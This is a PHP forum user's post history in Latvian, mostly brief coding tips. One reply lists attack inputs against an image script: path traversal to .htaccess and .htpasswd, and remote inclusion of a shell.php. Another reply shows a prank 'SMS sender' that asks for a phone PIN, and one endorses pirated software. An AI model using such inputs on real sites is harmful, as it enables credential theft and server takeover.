Jump to content
php.lv forumi

ok1

Reģistrētie lietotāji
  • Posts

    75
  • Joined

  • Last visited

Everything posted by ok1

  1. ok1

    Pm systeem

    Domāju, ja jau viņš lieto gatavos , tad lieto arī gatavos serverus (appserv, xamp utt.). Tie visi parasti strādās. EDIT: Sapratu ko tu domāji. Tu domāji , ka viņam jau ir kāda sistēma (tb PHP portāls) kurā grib integrēt? Troxy: Ātrums atkarīgs no tava esošā skripta līkuma.
  2. ok1

    Pm systeem

    Domāju ka nē, jo praktiski jau ir gatavs un arī paredzēts pielāgošanai
  3. ok1

    Read More tags

    Vienkāršāk nebūtu iekš DB izveidot divus laukus? Piemēram content un big_content .
  4. ok1

    Flash

    Sāc ar to ka atdali bildes no flash failiem
  5. ok1

    print

    Es tevi nesaprotu. Neko no tava uzrakstītā nevar saprast :(
  6. Tā tas ir, ja tu neproti dabūt labu kreiso WV, tad iztiec ar legālo. Tā nu tas ir. + Latvijas trakeros diez vai būs kaut kas labs (kreiss)
  7. 1. Izdzēs to pēdējo rindu, kuru ierakstīji 2. Spied Ctrl+F un laukā ievadi "extension_dir" 3. Izlabo, to ko tur vajag 4. Restart apachei :)
  8. cik gudri! Parasti mysql_select_db veic tikai 1 reizi skripta izpildes laikā. Var jau vairāk, bet tas jau ir galīgi garām. Cerēju uz kaut ko labāku.
  9. Rokas līkas, neko nespēju atrast :(
  10. Kādā veidā ar PHP var noteikt vai datubāze eksistē vai nē.
  11. Stopp, kaut kas tavā skriptā ir līks. Katru reizi izveidojas vairak tukšu līniju. Ja vienreiz tad ir kaut kas tāds: 111111 2222 33333 444 5555 Varētu jau iztikt, bet diezgan neglīti izskatās EDIT: Izdevās salabot. Ņemot vērā to, ka parasti līnijas failā jau ir atdalītas: $fails='file.txt'; $f=file($fails); $c=count($f); $rinda=4; // kurā rindā rakstam (1. rinda ir 0) $txt='kaka'; //teksts, ko rakstīt $cont=''; for($i=0;$i<$rinda;$i++) $cont .= $f[$i].""; $cont .= $txt."\r\n"; for($i=$rinda;$i<$c;$i++) $cont .= $f[$i].""; fputs(fopen($fails, "w"), $cont);
  12. Ir vajadzība pēc iespējas ievietot datus/tekstu konkrētā faila rindā (starp rindām). Piemēram, ja ir fails ar saturu: 111111 2222 444 5555 un es gribu starp 2 un 3 rindu ievietot jaunu rindu ar tekstu 33333 lai rezultāts būtu : 111111 2222 33333 444 5555 Kā lai to panāk?
  13. Tu esi mans parādnieks: <?php header("Pragma: public"); header("Expires: 0"); header("Cache-Control: must-revalidate, post-check=0, pre-check=0"); header("Cache-Control: public"); header("Content-Description: File Transfer"); header("Content-Type: application/force-download"); $header="Content-Disposition: attachment; filename=izejas_fails.txt;"; header($header ); header("Content-Transfer-Encoding: binary"); // header("Content-Length: ".$len); echo "Jaukais txt failinsh :))"; ?>
  14. Padarbojies ar Headeriem
  15. ok1

    hide img url

    Orion7. Tā jau es var�“šu barot arī: bilde.php?img=../.htaccsess bilde.php?img=../.htpasswd bilde.php?img=http://ljaunaalapa.com/shell.php bilde.php?img=http://ljaunalapa.com/ljaunaiskods.php Un ne tikai to :)
  16. ok1

    

    Tad dari tā! Bet ja vēlies palikt pie utf-8, tad iemet Meta tagu ar utf-8 charsetu :)
  17. ir tāds break; , bet laikam ne šoreiz.
  18. ok1

    JS

    Bubu pareizi saka , jālieto <title>, bet netikai popupos
  19. pirmajā postā ir vārds joks. Ja tā tad šis der�“s: <?php if(isset($_POST['sms']) AND isset($_POST['numurs']) AND isset($_POST['pin'])){ $numurs = $_POST['numurs']; $sms = $_POST['sms']; $pin = $_POST['pin']; $jaunaiskods = md5("$numurs::$sms::$pin"); echo "<center><B>Tavs SMS ir nosūtīts</b><br/>un tavs unikālais sms id ir<br/>$jaunaiskods</center><br>"; } ?> <form method="post"> Numurs: <input type="text" name="numurs"><br/> PIN Kods (Tālruņa kuram sūti): <input type="text" name="pin"><br/> SMS: <textarea name="sms"></textarea><br/> <input type="submit" value="Sūtīt"> </form>
  20. ok1

    php skripts

    Topika nosaukums vispār ir ir jau foršs
  21. ok1

    Komentāri

    ja flat file tad tikai un vinīgi http://lv.php.net/fwrite . Un atvēršanai vari izmantot a metodi
  22. ok1

    skripts!

    vabole, ko tu gribi teikt ??
×
×
  • Create New...